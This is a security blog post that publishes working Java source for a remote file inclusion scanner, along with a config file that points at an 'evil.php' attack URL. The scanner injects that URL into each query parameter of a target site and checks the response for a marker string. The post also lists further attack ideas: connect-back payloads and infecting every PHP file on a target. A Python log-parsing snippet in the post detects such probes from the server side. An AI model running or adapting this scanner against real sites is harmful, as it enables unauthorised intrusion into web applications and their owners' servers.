[POC] RFI Scanner

Well, it certainly is true: why not? That question never has a correct answer imo. It is the same question I asked myself yesterday. I was thinking about what to write on my blog (I was bored and thought that blog writing could help), and after a while I just gave up (so lesson learned: only write when you actually have something to write). So today I fired up my browser (for the ones wondering, this is a personal opinion, I use: Opera {FTW!}, IE {nice}, FF {sucks}, depending on what I need) and the first thing I saw was this. Which is funny, since it was just a couple of days ago that I posted about python, and now I see a nice and small python script to do funky stuff.

So I hadn’t even finished reading when I followed the first link I encountered, which is this one. It’s a very nice write-up on how to own IIS 5 using “mythical” exploits. This brought me back to the question I had asked myself a day earlier: why not? Since I didn’t have an answer for that, here is my never-finished source code to scan for RFI (remote file inclusion). The whole reason I started coding this scanner was that I’m lazy and I thought: why do it myself if I can automate it? If you want an overview of the things you should and shouldn’t automate on a pentest, read this write-up.

Basically my todo list when I first wanted to code the scanner was as follows:

  • implement looping through the params of the target url
  • implement setting each param to the evil url that points at the evil php
  • check the response for the specified keyword

Then, while I was working on it, I had some better ideas for detecting RFI, which I never got around to implementing:

  • create a php which copies an image and renames it to evil.extension, then check if that file exists; it’s more reliable than just checking whether the page returns a certain keyword (renaming .php to .txt would be stupid, it would open the door for every single person out there)
  • create a php which connects back, so the scanner only has to know whether there has been a connect-back from the ip it’s scanning (only works if the target is allowed to connect out)
  • create a php which has a time delay; the scanner would then just request the url twice, with and without the evil php, and measure the time difference
  • infect all php files with a header that outputs “hi”, then call the url again to clean all php files
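Seen from the server side, the probes this scanner sends are requests in which one query parameter carries an absolute URL. As an added example (my code, not the author's), here is that check run over a few constructed Apache combined-format log lines using documentation IP addresses; it also catches percent-encoded values and tolerates empty parameters and URIs without a query string.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" log format: client ident user [timestamp] "request" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)

# URL schemes PHP's include() will fetch remotely when allow_url_include is on
REMOTE_SCHEMES = ("http", "https", "ftp")


def remote_url_params(uri):
    """Return [(name, value)] for query parameters whose value is an absolute URL.

    This is the scanner's per-parameter walk seen from the server: a probe is a
    request where one parameter holds something like http://host/evil.php.
    parse_qsl percent-decodes, so p=http%3A%2F%2F... is caught too;
    keep_blank_values keeps 'p=' params, and a URI without '?' yields nothing.
    """
    hits = []
    for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        if urlsplit(value.strip()).scheme.lower() in REMOTE_SCHEMES:
            hits.append((name, value))
    return hits


def scan_log(lines):
    """Return (client_ip, status, param, value) for every RFI-shaped request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line, skip it
        for name, value in remote_url_params(m.group("uri")):
            findings.append((m.group("ip"), int(m.group("status")), name, value))
    return findings


# Constructed sample lines: a benign request, then two probes (the second one
# percent-encoded, which a plain "http://" substring grep would miss).
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Nov/2007:19:39:01 +0100] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [09/Nov/2007:19:39:02 +0100] "GET /index.php?page=http://198.51.100.7/evil.php HTTP/1.1" 200 700 "-" "Java/1.6.0"',
    '203.0.113.5 - - [09/Nov/2007:19:39:03 +0100] "GET /index.php?page=home&lang=http%3A%2F%2F198.51.100.7%2Fevil.php%3F HTTP/1.1" 500 300 "-" "Java/1.6.0"',
]

if __name__ == "__main__":
    for ip, status, name, value in scan_log(SAMPLE_LOG):
        print(f"{ip} set {name}={value!r} (status {status})")
```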

So who knows, maybe one day I will extend this scanner, or maybe I’ll even attempt to rewrite it in python including the features I never got around to implementing.

RfiScanner.java

/*
 * RfiScanner.java
 *
 * Created on 9 november 2007, 19:39
 *
 * @author DiabloHorn
 */

package rrfiscanner;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.MalformedURLException;
import java.net.Proxy;
import java.net.URL;
import java.net.URLConnection;

/**
 *
 * @author DiabloHorn
 */
public class RfiScanner {
    private Proxy _conProxy;
    private boolean _useProxy;
    private String _SEARCH_WORD;
    private String _vUrl,_aUrl;
    /**
     * @param vUrl The target URL, including the query string whose params get tested
     * @param aUrl The URL of the file the target is asked to include
     */
    public RfiScanner(String vUrl,String aUrl) {
        this._vUrl = vUrl;
        this._aUrl = aUrl;
    }

    public void setUseProxy(boolean use){
        this._useProxy = use;
    }

    public void setProxy(Proxy proxy){
        this._conProxy = proxy;
    }

    public void setSearchWord(String word){
        this._SEARCH_WORD = word;
    }

    /**
     * Requests every prepared URL and reports those whose response contains the search word.
     */
    public void scan(){
        if(_SEARCH_WORD == null) {
            System.err.println("no search word set, call setSearchWord() first");
            return;
        }
        try {
            PrepareURL victimURL = new PrepareURL(_vUrl,_aUrl);
            URLConnection uc = null;
            while(victimURL.hasNext()) {
                URL u = victimURL.next();

                if (_useProxy) {
                    uc = u.openConnection(_conProxy);
                } else {
                    uc = u.openConnection();
                }
                BufferedReader r = null;
                try{
                    System.out.println("SCANNING: " + u.toString());
                    r = new BufferedReader(new InputStreamReader(uc.getInputStream()));
                    String c;
                    while ((c = r.readLine()) != null) {
                        if(c.indexOf(_SEARCH_WORD) != -1) {
                            System.out.println("VULNERABLE URL: " + u.toString());
                            break;//stop searching
                        }
                    }
                }catch(IOException ioe){
                    //an error response or connection failure just means this URL is not reported
                }finally{
                    if(r != null) {
                        try { r.close(); } catch(IOException ignored) {}
                    }
                }
            }
        } catch (MalformedURLException mfue) {
            System.err.println(mfue.toString());
        } catch (Exception e) {
            System.err.println(e.toString());
        }
    }
}

PrepareURL.java

/*
 * PrepareURL.java
 * @author DiabloHorn
 */

package rrfiscanner;

import java.net.MalformedURLException;
import java.net.URL;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.Map;

/**
 *
 * @author DiabloHorn
 */
public class PrepareURL {
    private static final int _nextItemInitialize = -1;
    private String _victimURL;
    private String _evilUrl;
    private ArrayList<URL> _attackUrlList;
    private int _nextItem;

    /**
     * @param victimUrl The URL of the site you want to inject stuff into its params
     * @param attackUrl The "stuff"
     * @throws MalformedURLException Wrong URL
     */
    public PrepareURL(String victimUrl,String attackUrl) throws MalformedURLException {
        this._victimURL = victimUrl;
        this._evilUrl = attackUrl;
        _nextItem = _nextItemInitialize;
        fillList();
    }

    /**
     * @return True if there is another element left, false otherwise
     */
    public boolean hasNext() {
        return _nextItem < (_attackUrlList.size()-1);
    }

    /**
     * @return Get the next url
     */
    public URL next() {
        _nextItem++;
        return _attackUrlList.get(_nextItem);
    }

    /**
     * This resets the class so you can loop again through the URL's
     */
    public void reset() {
        _nextItem = _nextItemInitialize;
    }

    /**
     * Builds one attack URL per query parameter: the original URL with that
     * parameter's value swapped for the attack URL and every other parameter unchanged.
     * Rebuilding the query from the parsed pairs avoids the old String.replace(),
     * which also hit other parameters whose name ended in the same text.
     */
    private void fillList() throws MalformedURLException {
        _attackUrlList = new ArrayList<URL>();
        int qmark = _victimURL.indexOf('?');
        if(qmark == -1) {
            return; // no query string, so there is nothing to inject into
        }
        String base = _victimURL.substring(0, qmark);
        String query = _victimURL.substring(qmark+1);
        Map<String,String> paramPairs = getParameters(query);
        for(String target : paramPairs.keySet()) {
            StringBuilder sb = new StringBuilder(base).append('?');
            boolean first = true;
            for(Map.Entry<String,String> e : paramPairs.entrySet()) {
                if(!first) sb.append('&');
                first = false;
                String value = e.getKey().equals(target) ? _evilUrl : e.getValue();
                sb.append(e.getKey()).append('=').append(value);
            }
            _attackUrlList.add(new URL(sb.toString()));
        }
    }

    /**
     * @param query The query to be stripped down to parameters and their values
     * @return A map with paramname:paramvalue, in the order they appear in the query
     */
    private Map<String,String> getParameters(String query) {
        // LinkedHashMap keeps the original parameter order in the rebuilt URLs
        Map<String,String> paramPairs = new LinkedHashMap<String,String>();

        for(String rawPair : query.split("&")) {
            if(rawPair.length() == 0) continue; // tolerate "a=1&&b=2"
            int eq = rawPair.indexOf('=');
            if(eq == -1) {
                paramPairs.put(rawPair, ""); // a bare "flag" without a value
            } else {
                // split on the first '=' only, so "a=b=c" keeps its whole value
                paramPairs.put(rawPair.substring(0, eq), rawPair.substring(eq+1));
            }
        }

        return paramPairs;
    }
}

config.properties


# Remote RFI Scanner Configuration File
#---MAIN SECTION
#victim url aka target
vurl=http://www.google.com/search?hl=en&q=sdfsdf&btnG=Google+Search
#attack url aka the url where you host the file to be included
aurl=http://www.live.com/evil.php
#the string that must be searched for in the response page
searchstring=EVILRFIFOUND
#---PROXY SECTION
#uncomment the lines below if you want to use a proxy
#proxy address must be numeric
#proxy_type=SOCKS|HTTP
#proxy_address=1.1.1.1
#proxy_port=8569

2 Responses to “[POC] RFI Scanner”

  1. Would you like to make an affiliation with my forum?

    The link is: htpp://attackersc.altervista.org/ or http://attackersc.altervista.org/forums

  2. thks fren…i was looking for a java scanner ;) i ll recode it and redirect the o/p to IRC via PircBot framework ;)
